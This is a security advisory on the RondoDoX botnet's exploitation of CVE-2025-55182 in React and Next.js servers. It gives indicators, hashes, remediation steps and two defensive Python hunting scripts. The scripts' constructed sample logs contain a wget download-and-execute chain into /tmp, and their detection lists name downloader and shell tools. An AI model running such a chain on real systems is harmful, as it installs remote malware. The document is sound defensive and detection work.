RondoDoX Botnet Weaponizes React2Shell (CVE-2025-55182) for Mass Exploitation of React and Next.js Infrastructure

January 6th, 2026

Critical

Our Cyber Threat Intelligence Unit is monitoring an active exploitation campaign attributed to the RondoDoX botnet that is abusing CVE-2025-55182 (React2Shell), a critical remote code execution (RCE) vulnerability in React Server Components (RSC). This campaign reflects a continued pattern of real-world exploitation of React2Shell (as seen in our December 8th, 2025 advisory), which highlights the operational impact and ease of weaponization associated with this vulnerability. Following public disclosure in early December 2025, threat actors rapidly operationalized the vulnerability to achieve unauthenticated server-side code execution via maliciously crafted HTTP POST requests. RondoDoX exploits unsafe deserialization in React’s Flight protocol to compromise vulnerable Next.js App Router and RSC deployments, enabling the automated deployment of cryptominers, Mirai-based malware, and botnet loaders at scale. Given the breadth of exposure across internet-facing infrastructure and the high reliability of the exploit chain, this activity poses severe operational risks to organizations and requires urgent remediation and enhanced monitoring. 

Technical Details

  • Threat Name: RondoDoX Botnet – React2Shell Weaponization

  • CVE ID: CVE-2025-55182

  • CVSS Score: 10.0 (Critical)

  • Attack Type: Automated Mass Exploitation, Botnet Propagation, Malware Distribution

  • Vulnerable Components / Libraries include:

    • react-server-dom-webpack

    • react-server-dom-parcel

    • react-server-dom-turbopack

  • Vulnerability Root Cause:

    • RondoDoX exploits unsafe deserialization in React’s Flight protocol, abusing the same logical issue underlying CVE-2025-55182.

    • Improper validation in the requireModule function within react-server-dom-webpack allows attacker-supplied payloads to be interpreted as executable server-side JavaScript.

      • This results in arbitrary code execution with the privileges of the Node.js process.

Attack Vector & Exploitation Mechanics:

  • Initial Access Vector: Automated scanning of exposed React Server Component endpoints, followed by delivery of malformed HTTP POST payloads.

  • Exploitation Method: Malicious Flight protocol payloads manipulate module resolution logic in React Server Components, coercing the server to invoke vm.runInThisContext() on attacker-controlled input.

  • Payload Retrieval & Execution: Upon successful exploitation, compromised systems retrieve secondary payloads from attacker-controlled infrastructure using tools such as wget, curl, or tftp.

  • Post-Compromise Behavior Includes:

    • Cryptominer deployment

    • Botnet loader installation

    • “Health-check” binaries removing competing malware

    • Mirai-derived malware variants

      • These actions facilitate persistence, resource hijacking, botnet enrollment, and malware propagation.

Because this vulnerability relies on deterministic logic rather than memory corruption, exploitation remains high-reliability and well-suited for automated mass scanning and compromise.

Impact

  • Active Infrastructure Compromise: Widespread exploitation of Next.js servers and exposed RSC deployments, with potential for complete system takeover.

  • Botnet Expansion: Compromised systems are enrolled into the RondoDoX botnet, increasing adversary computing capacity and operational reach.

  • Malware & Resource Hijacking: Cryptominers and malware degrade system performance, availability, and security posture.

  • Global Exposure: Shadowserver telemetry indicates tens of thousands of internet-accessible instances remain vulnerable.

Detection Method

Organizations should monitor for indicators of exploitation, including:

  • Suspicious or malformed HTTP POST requests targeting RSC or Server Action endpoints

  • Unexpected Node.js child processes

  • File creation in /tmp or /var/tmp

  • Outbound connections from web servers to unknown or newly observed IP addresses

  • Downloads initiated using wget / curl / tftp

  • Serialized Flight payloads exhibiting anomalous structure or length
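The rule set below turns the indicators listed above into something a hunter can run over exported telemetry. It is an added example written for this advisory, not tooling from the advisory's authors; the access-log and process-audit line formats, the 16 KiB body-size threshold and the set of content types treated as Server Action / RSC traffic are all assumptions chosen for illustration, and the sample lines are constructed rather than captured.

```python
import re
from dataclasses import dataclass

# Request-body size (bytes) above which a Server Action / RSC POST is treated as
# anomalous. Assumed starting value for this example; baseline it per application.
MAX_EXPECTED_ACTION_BODY = 16 * 1024

# Content types this example associates with Server Action / RSC requests.
# Assumption for illustration; confirm against the framework version you run.
RSC_CONTENT_TYPES = {"multipart/form-data", "text/plain", "text/x-component"}

DOWNLOADERS = {"wget", "curl", "tftp"}
SHELLS = {"sh", "bash", "dash", "busybox"}
TMP_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


# Constructed access-log format: ip method path status body_bytes content_type
ACCESS_LINE = re.compile(
    r"^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<path>\S+) (?P<status>\d{3}) "
    r"(?P<body>\d+) (?P<ctype>\S+)$"
)


def triage_access(lines):
    """Flag POSTs carrying RSC-style content types with an oversized body."""
    findings = []
    for line in lines:
        m = ACCESS_LINE.match(line)
        if not m or m["method"] != "POST":
            continue
        ctype = m["ctype"].split(";")[0].lower()
        if ctype in RSC_CONTENT_TYPES and int(m["body"]) > MAX_EXPECTED_ACTION_BODY:
            findings.append(Finding("oversized_rsc_post", line))
    return findings


# Constructed process-audit format: parent=<name> child=<name> argv="<cmdline>"
PROC_LINE = re.compile(r'^parent=(?P<parent>\S+) child=(?P<child>\S+) argv="(?P<argv>.*)"$')


def triage_process(lines):
    """Flag Node.js spawning shells/downloaders, downloader use, and /tmp staging."""
    findings = []
    for line in lines:
        m = PROC_LINE.match(line)
        if not m:
            continue
        tokens = m["argv"].split()
        if m["parent"] == "node" and m["child"] in SHELLS | DOWNLOADERS:
            findings.append(Finding("node_spawned_shell_or_downloader", line))
        if any(t in DOWNLOADERS for t in tokens):
            findings.append(Finding("downloader_invoked", line))
        if any(t.startswith(TMP_DIRS) for t in tokens):
            findings.append(Finding("tmp_staging", line))
    return findings


def by_rule(findings):
    """Count findings per rule for a quick hunting summary."""
    counts = {}
    for f in findings:
        counts[f.rule] = counts.get(f.rule, 0) + 1
    return counts


# Constructed sample telemetry (not real captures); IPs are documentation ranges.
SAMPLE_ACCESS = [
    "198.51.100.7 GET /products 200 0 -",
    "198.51.100.7 POST /products 200 612 multipart/form-data;boundary=----x",
    "203.0.113.9 POST /products 500 98304 multipart/form-data;boundary=----y",
    "203.0.113.9 POST /products 500 73012 text/plain",
    "192.0.2.30 POST /api/upload 200 5242880 application/octet-stream",
]
SAMPLE_PROCESS = [
    'parent=node child=node argv="node /srv/app/node_modules/.bin/next start"',
    'parent=node child=sh argv="sh -c wget http://203.0.113.9/nuts/bolts -O /tmp/.h; chmod +x /tmp/.h; /tmp/.h"',
    'parent=sshd child=bash argv="bash -l"',
    'parent=cron child=curl argv="curl -s https://updates.example.internal/health"',
]

if __name__ == "__main__":
    for f in triage_access(SAMPLE_ACCESS) + triage_process(SAMPLE_PROCESS):
        print(f"[{f.rule}] {f.evidence}")
```

Run against the sample data, the two oversized Server Action POSTs and the Node.js-spawned downloader chain light up, while the large `application/octet-stream` upload and the interactive SSH shell do not. The `downloader_invoked` rule on its own is noisy (the scheduled `curl` health check trips it), which is why the Node.js parent-process and `/tmp` staging rules matter: a single event matching all three is far stronger evidence than any one rule alone.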

Indicators of Compromise

IP Addresses (defanged):

  • 74[.]194[.]191[.]52

  • 70[.]184[.]13[.]47

  • 41[.]231[.]37[.]153

  • 5[.]255[.]121[.]141

  • 89[.]144[.]31[.]18

  • 51[.]81[.]104[.]115

  • 5[.]231[.]70[.]66

  • 95[.]214[.]52[.]170

  • 37[.]114[.]37[.]94

  • 37[.]114[.]37[.]82

Observed Payload Paths:

  • /nuts/poop – Cryptominer payload

  • /nuts/bolts – Botnet loader / health-checker

  • /nuts/x86 – Mirai-variant payload

File Hashes (SHA-256):

  • 895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b

  • 8e0bc23a87d349e5a5356252ce17576093b7858fdf6ea84919fbdcb2e117168e

  • 50be5257678412f0810d46e0b0bc573eb65c6ce4617346c1527ff0dc9b7fc79e

  • 858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb
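The indicators above are published defanged and with inconsistent bracket placement, so the first step of any hunt is to normalise them. The script below is an added example, not tooling from the advisory's authors: it refangs the listed IPs, sweeps constructed egress/exec log lines for the IPs and payload paths, and hashes files for comparison against the published SHA-256 values. The log line format and the sample file contents are constructed for illustration.

```python
import hashlib
import ipaddress
import re
import tempfile
from pathlib import Path

# Indicators exactly as published in the advisory, defanging left untouched.
DEFANGED_IPS = [
    "74[.]194[.]191[.]52", "70[.]184[.]13[.]47", "41[.]231[.]37[.]153",
    "5[.]255[.]121[.]141", "89[.]144[.]31[.]18", "51[.]81[.]104[.]115",
    "5[.]231[.]70[.]66", "95[.]214.52.170", "89[.]144.31.18",
    "37[.]114.37.94", "37[.]114.37.82",
]
PAYLOAD_PATHS = {
    "/nuts/poop": "cryptominer",
    "/nuts/bolts": "botnet loader / health-checker",
    "/nuts/x86": "Mirai-variant",
}
KNOWN_SHA256 = {
    "895f8dff9cd26424b691a401c92fa7745e693275c38caf6a6aff277eadf2a70b",
    "8e0bc23a87d349e5a5356252ce17576093b7858fdf6ea84919fbdcb2e117168e",
    "50be5257678412f0810d46e0b0bc573eb65c6ce4617346c1527ff0dc9b7fc79e",
    "858874057e3df990ccd7958a38936545938630410bde0c0c4b116f92733b1ddb",
}


def refang(ioc: str) -> str:
    """Undo common IP defanging and validate the result; raises ValueError on junk."""
    s = ioc.strip().replace("[.]", ".").replace("(.)", ".").replace("[dot]", ".")
    return str(ipaddress.ip_address(s))


# Building a set also collapses the duplicated 89.144.31.18 entry.
IOC_IPS = {refang(i) for i in DEFANGED_IPS}

IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def sweep_log(lines):
    """Return lines touching a listed IP or payload path, with what matched."""
    hits = []
    for line in lines:
        ips = set(IPV4_RE.findall(line)) & IOC_IPS
        paths = [p for p in PAYLOAD_PATHS if p in line]
        if ips or paths:
            hits.append({"line": line, "ips": sorted(ips), "paths": paths})
    return hits


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path) -> str:
    """Stream the file so large binaries do not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def check_file(path) -> bool:
    """True when the file's SHA-256 is one of the published sample hashes."""
    return sha256_file(path) in KNOWN_SHA256


def write_constructed_sample() -> Path:
    """Write a harmless constructed file to stand in for a recovered /tmp artifact."""
    p = Path(tempfile.mkdtemp()) / "recovered_artifact.bin"
    p.write_bytes(b"constructed sample, not malware\n")
    return p


# Constructed egress/exec log lines (not real captures); the benign destinations
# use documentation address ranges.
SAMPLE_EGRESS = [
    "2026-01-05T10:02:11Z web01 node[2210] connect dst=89.144.31.18:80 proto=tcp",
    "2026-01-05T10:02:12Z web01 sh[2214] exec wget http://89.144.31.18/nuts/bolts -O /tmp/.h",
    "2026-01-05T10:03:40Z web01 node[2210] connect dst=198.51.100.20:443 proto=tcp",
    "2026-01-05T10:04:02Z web02 curl[3301] GET http://198.51.100.5/nuts/x86",
]

if __name__ == "__main__":
    for hit in sweep_log(SAMPLE_EGRESS):
        print(hit["ips"], hit["paths"], "<-", hit["line"])
    print("known sample:", check_file(write_constructed_sample()))
```

Matching is deliberately split: the second sample line is caught by both the IP and the path, while the last line matches only the `/nuts/x86` path from an unlisted host, which is exactly the kind of partial hit that points at infrastructure not yet on the list. Hash comparison only identifies the four samples published here, so treat it as a confirmation step and lean on the behavioural indicators above for coverage.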

Recommendations

  • Patch Immediately: Upgrade all React Server Component packages and affected Next.js App Router deployments to versions addressing CVE-2025-55182.

  • Restrict Exposure: Apply network segmentation, reverse proxy controls, and firewall policy enforcement to limit RSC endpoint accessibility.

  • Enhance Runtime Visibility: Deploy monitoring capable of detecting Node.js execution anomalies and unauthorized process activity.

  • Block Known Infrastructure: Add identified RondoDoX-associated IPs and domains to network-level deny lists.

  • Audit & Rebuild Where Necessary: Inspect impacted systems, remove malicious artifacts, and perform clean redeployment if compromise is confirmed or suspected.

Conclusion

The RondoDoX botnet has fully operationalized CVE-2025-55182 (React2Shell) as its primary attack vector for mass-compromising React and Next.js infrastructure. The scale, automation, and reliability of the exploit chain significantly increase operational risk. We urge organizations to treat this as a critical security event and prioritize patching, hardening, IOC-driven threat hunting, and continuous monitoring to prevent sustained compromise and mitigate risks associated with this ongoing campaign.